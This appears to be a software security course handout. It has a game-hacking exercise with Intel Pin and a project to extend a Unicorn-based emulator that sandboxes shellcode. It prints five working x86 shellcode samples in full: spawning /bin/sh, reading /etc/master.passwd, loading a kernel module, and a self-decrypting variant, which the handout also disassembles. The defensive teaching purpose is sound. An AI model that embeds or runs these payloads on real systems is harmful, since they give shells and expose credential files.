$ cd
$ wget https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh
$ chmod +x pin.sh
$ ./pin.sh
If you see the pin binary in your home folder, the installation is successful.
You are given the Moon-buggy game. Your goal is to use Intel Pin to make the moon buggy keep going even after crashes.
First, watch the video. It shows two moon buggy executions.
You need to figure out how to make your own Pin tool that achieves the same goal: make the moon buggy keep going after crashes. You are supposed to figure this out by yourself by analyzing the source code.
$ sudo apt-get install autoconf automake texinfo
$ sudo apt-get install libncurses5-dev libncursesw5-dev
$ ./autogen.sh
$ ./configure
$ make
$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh
$ chmod +x prj1.sh
$ ./prj1.sh
The buggy has a laser that can be fired with the a key. Each shot deducts points from your game score. Can you make it increase the score instead (e.g., every time you use the laser, you gain 10000 points)?
Remote exploitation of a vulnerable program is a common tactic in cyber attacks. Typically, an attacker sends maliciously crafted input to a vulnerable program. Such input often consists of two parts: a malicious payload, which is executed after successful exploitation, and an input that exploits the vulnerability to hijack the control flow and redirect it to the injected payload.
The above figure shows an example scenario.
/bin/sh
Since the malicious payload is essentially the code bytes of a sequence of instructions, it can be anything. In practice, there are two typical forms of malicious payload: shellcode and ROP.
In this project, we only focus on shellcode. The following website gives a few examples of popular shellcode: http://shell-storm.org/shellcode/.
Suppose you obtain a potentially malicious payload (e.g., from network logs) and would like to know what it does. Executing it on a real machine or VM is a viable option, but a successful exploit would also harm that machine or VM. Sandboxing is a technique that runs a program while preventing it from doing any harm to the host system. In practice, sandboxing is commonly used to execute potentially malicious code because it lets you observe malicious actions without harming the host system.
This project asks you to create a sandboxing tool that executes such payloads safely using code emulation techniques. Specifically, given a sequence of code bytes (i.e., instructions), you run them and report what actions they take (e.g., making a system call, performing a particular computation, etc.).
You are given the below shellcode examples. Your goal is to make your program properly interpret their executions (e.g., what system calls were made with which arguments):
CODE_EXAMPLE1
\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0
\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1
CODE_EXAMPLE2
\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
CODE_EXAMPLE3
\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62
\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x0b\x50\xcd\x80\x50\x50\xcd
\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61
\x73\x73\x77\x64
CODE_EXAMPLE4
\xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57
\x53\x50\xb0\x0b\xcd\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64
\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f
CODE_EXAMPLE5
\x31\xd2\xeb\x0e\x31\xdb\x5b\xb1\x19\x83\x2c\x1a\x01\x42\xe2\xf9\xeb\x05\xe8\xed
\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x32\xdc\x8a\xe4
\x51\x55\x54\x51\xb1\x0c\xce\x81
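The samples above are written in C-style escape notation, and CODE_EXAMPLE2 mixes escapes with literal characters such as //sh. Before an emulator can run them, the text has to become raw bytes. The following is a minimal sketch of one way to do that conversion; the function name parse_shellcode is hypothetical and is not part of the provided emul.py.

```python
import re

# Matches either a \xNN escape (group 1) or any single literal character (group 2).
_TOKEN = re.compile(r"\\x([0-9a-fA-F]{2})|(.)", re.DOTALL)


def parse_shellcode(text):
    """Convert escape-notation shellcode text into raw bytes.

    Whitespace (including the line breaks used in the listings) is skipped;
    any other literal character is taken as its ASCII byte.
    """
    out = bytearray()
    for hex_pair, literal in _TOKEN.findall(text):
        if hex_pair:
            out.append(int(hex_pair, 16))
        elif not literal.isspace():
            out.extend(literal.encode("latin-1"))
    return bytes(out)


if __name__ == "__main__":
    example2 = r"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    print(parse_shellcode(example2).hex())
```

Skipping whitespace is a design choice made so that a multi-line listing can be pasted as is; it would be wrong for a payload that intentionally contains a literal space character.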
You are given a program, emul.py, which leverages the Unicorn framework to run a given shellcode and report the executed instructions and their results.
The program is already capable of executing a simple shellcode that does not cause any errors and uses a few system calls.
Syscall Number | Syscall Name |
---|---|
1 | sys_exit |
4 | sys_write |
11 | sys_execve |
48 | sys_signal |
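As a rough illustration of how the table above could drive the emulator's reporting, the sketch below maps the listed numbers to names and falls back to a plain informational message for any other number. The names SYSCALL_NAMES and describe_syscall are hypothetical and are not taken from emul.py; the entry for 11 uses the Linux name sys_execve.

```python
# Hypothetical lookup table built from the syscall table in this handout.
SYSCALL_NAMES = {
    1: "sys_exit",
    4: "sys_write",
    11: "sys_execve",  # syscall 11 on 32-bit x86 Linux is execve
    48: "sys_signal",
}


def describe_syscall(number):
    """Return a one-line, non-error description of a syscall number."""
    name = SYSCALL_NAMES.get(number)
    if name is None:
        # Unknown numbers are reported, not treated as a failure.
        return "syscall %d (not in the table)" % number
    return "syscall %d -> %s" % (number, name)


if __name__ == "__main__":
    for n in (11, 48, 0):
        print(describe_syscall(n))
```

A dictionary keeps the mapping in one place, so supporting another system call is a one-line change instead of another branch.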
The program is already capable of running the first two shellcode samples: CODE_EXAMPLE1 and CODE_EXAMPLE2.
The screenshot below is an example of executing CODE_EXAMPLE1 with the provided program:
The program is configured as follows:
0x1000000
0x1200000
continue
command below).
The continue command executes the remaining instructions that have not been covered yet.
Running continue two more times gives the following output, meaning that there are no remaining instructions to execute.
To see how continue is implemented, search for the inst_remain variable in project3.py and check the related code.
While Code Examples 1 and 2 are already supported, Examples 3, 4, and 5 are not supported correctly.
Your goal is to add the code to support them. Here is the list of challenges and potential solutions.
Adding an elif for system call 0 and printing a message (not an error message) would be sufficient.
"Are we executing a string?" when an address that is known to be a string is executed):
Example 5's shellcode is encrypted. Its disassembly is shown below.
0: 31 d2 xor edx,edx
2: eb 0e jmp 0x12
4: 31 db xor ebx,ebx
6: 5b pop ebx
7: b1 19 mov cl,0x19
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1
d: 42 inc edx
e: e2 f9 loop 0x9
10: eb 05 jmp 0x17
12: e8 ed ff ff ff call 0x4
17: 32 c1 xor al,cl
19: 51 push ecx
1a: 69 30 30 74 69 69 imul esi,DWORD PTR [eax],0x69697430
20: 30 63 6a xor BYTE PTR [ebx+0x6a],ah
23: 6f outs dx,DWORD PTR ds:[esi]
24: 32 dc xor bl,ah
26: 8a e4 mov ah,ah
28: 51 push ecx
29: 55 push ebp
2a: 54 push esp
2b: 51 push ecx
2c: b1 0c mov cl,0xc
2e: ce into
2f: 81 .byte 0x81
Observe the execution flow: 0 -> 2 -> 12 -> 4 -> 6 -> 7 -> 9 -> d -> …
In particular, see the loop from 9 to e.
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1
d: 42 inc edx
e: e2 f9 loop 0x9
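The loop performs a very simple decryption (value = value - 1) whose target buffer is the code starting at 17. With cl set to 0x19 at 7 (and assuming the rest of ecx is zero), the loop runs 25 times, once for each byte from 17 through 2f.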
0: 31 d2 xor edx,edx
2: eb 0e jmp 0x12 ----------------------------|
4: 31 db xor ebx,ebx <------------------------|--|
6: 5b pop ebx | |
7: b1 19 mov cl,0x19 | |
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1 | |
d: 42 inc edx | |
e: e2 f9 loop 0x9 | |
10: eb 05 jmp 0x17 | |
12: e8 ed ff ff ff call 0x4 <---------------------------|--|
--------------------------------------------
17: 32 c1 xor al,cl
...
If we manually apply the decryption, we get the following code:
0: 31 d2 xor edx,edx
2: eb 0e jmp 0x12
4: 31 db xor ebx,ebx
6: 5b pop ebx
7: b1 19 mov cl,0x19
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1
d: 42 inc edx
e: e2 f9 loop 0x9
10: eb 05 jmp 0x17
12: e8 ed ff ff ff call 0x4
--------------------------------------------
17: 31 c0 xor eax,eax
19: 50 push eax
1a: 68 2f 2f 73 68 push 0x68732f2f
1f: 68 2f 62 69 6e push 0x6e69622f
24: 31 db xor ebx,ebx
26: 89 e3 mov ebx,esp
28: 50 push eax
29: 54 push esp
2a: 53 push ebx
2b: 50 push eax
2c: b0 0b mov al,0xb
2e: cd 80 int 0x80
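The manual decryption above can be reproduced with a few lines of Python. This sketch treats the loop as a byte-wise "subtract 1", which is a simplification of the actual sub DWORD PTR instruction; the simplification holds here because none of the encrypted bytes is 0x00, so no borrow reaches the neighbouring bytes. The names SHELLCODE, START, COUNT, and decrypt are hypothetical.

```python
# CODE_EXAMPLE5 exactly as listed in this handout (48 bytes).
SHELLCODE = bytes.fromhex(
    "31 d2 eb 0e 31 db 5b b1 19 83 2c 1a 01 42 e2 f9 eb 05 e8 ed"
    "ff ff ff 32 c1 51 69 30 30 74 69 69 30 63 6a 6f 32 dc 8a e4"
    "51 55 54 51 b1 0c ce 81"
)

START = 0x17  # offset of the encrypted region (return address of the call at 0x12)
COUNT = 0x19  # loop counter loaded into cl at offset 7


def decrypt(code, start, count):
    """Subtract 1 from `count` bytes of `code` beginning at offset `start`."""
    buf = bytearray(code)
    for i in range(start, start + count):
        buf[i] = (buf[i] - 1) & 0xFF
    return bytes(buf)


if __name__ == "__main__":
    decrypted = decrypt(SHELLCODE, START, COUNT)
    print(" ".join("%02x" % b for b in decrypted[START:]))
```

The bytes printed for the decrypted region can be compared against the listing above, from offset 17 to the final int 0x80.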
Now, your goal is to improve the program to handle this code.
If you run project3.py as modified so far, you will get the output shown in the following screenshot.
Currently, the program stops analysis if it encounters the same instruction twice within the same execution.
See the code below in hook_code().
# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    ...
    elif address in inst_executed_local:
        if address in cnt_repeated:
            cnt_repeated[address] = cnt_repeated[address] + 1
        else:
            cnt_repeated[address] = 1
        output = "Already covered (stop analysis):: addr %x (repeated: %d)" % (address, cnt_repeated[address])
        out(output)
        uc.emu_stop()
        return
This code terminates the analysis by calling uc.emu_stop() as soon as any instruction is executed more than once (see the condition at line 4).
As we saw, the decryption requires a loop, so you have to allow instructions to be executed repeatedly. In this homework, you are asked to allow each instruction to run up to 100 times.
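One possible way to express such a limit is a per-address counter that reports when an address has been seen too often. The sketch below is independent of the provided code: MAX_REPEAT and record_and_check are hypothetical names, and it assumes that "up to 100 times" means the 101st execution of the same address is the one that should stop the analysis.

```python
MAX_REPEAT = 100  # limit stated in this handout


def record_and_check(address, counts, limit=MAX_REPEAT):
    """Count one execution of `address`.

    Returns True once the address has been executed more than `limit`
    times, which is the point where the caller would stop the emulation.
    """
    counts[address] = counts.get(address, 0) + 1
    return counts[address] > limit


if __name__ == "__main__":
    counts = {}
    stops = [record_and_check(0x9, counts) for _ in range(101)]
    print(stops.count(True), counts[0x9])
```

Inside an instruction hook, a True result would be the place to report the address and call uc.emu_stop(), as the existing code does for a single repeat.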
After you make this change, you get the following result:
Now we can execute the first system call, but continue does not work for the decrypted code.
Observe that the code shown is the original code, which has not been decrypted.
This is because when we run the program again, we lose the previous memory state that holds the decrypted code.
The last piece of this project is to save the memory state at the end of the execution and load it in the next run.
The final outcome should allow you to run the program twice more, covering SYS_EXECVE twice with different arguments.
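The save and load step could be sketched as two small helpers that copy a memory region to a file and back. The sketch assumes only that the emulator object offers mem_read(address, size) and mem_write(address, data), as Unicorn's Python Uc object does. The helper names, the file path, and the choice of region are all hypothetical and would have to match how the provided program maps its memory.

```python
def save_memory(uc, base, size, path):
    """Dump `size` bytes starting at `base` from the emulator into `path`."""
    data = bytes(uc.mem_read(base, size))
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


def load_memory(uc, base, path):
    """Write a previously saved dump back into the emulator at `base`."""
    with open(path, "rb") as f:
        data = f.read()
    uc.mem_write(base, data)
    return len(data)
```

Calling save_memory when a run ends and load_memory right after the region is mapped in the next run would let the decrypted bytes survive between runs. Storing raw bytes keeps the file easy to inspect with a hex viewer.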
emul.py and emul_util.py. Put them in the bindings folder.
$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh
$ chmod +x prj2.sh
$ ./prj2.sh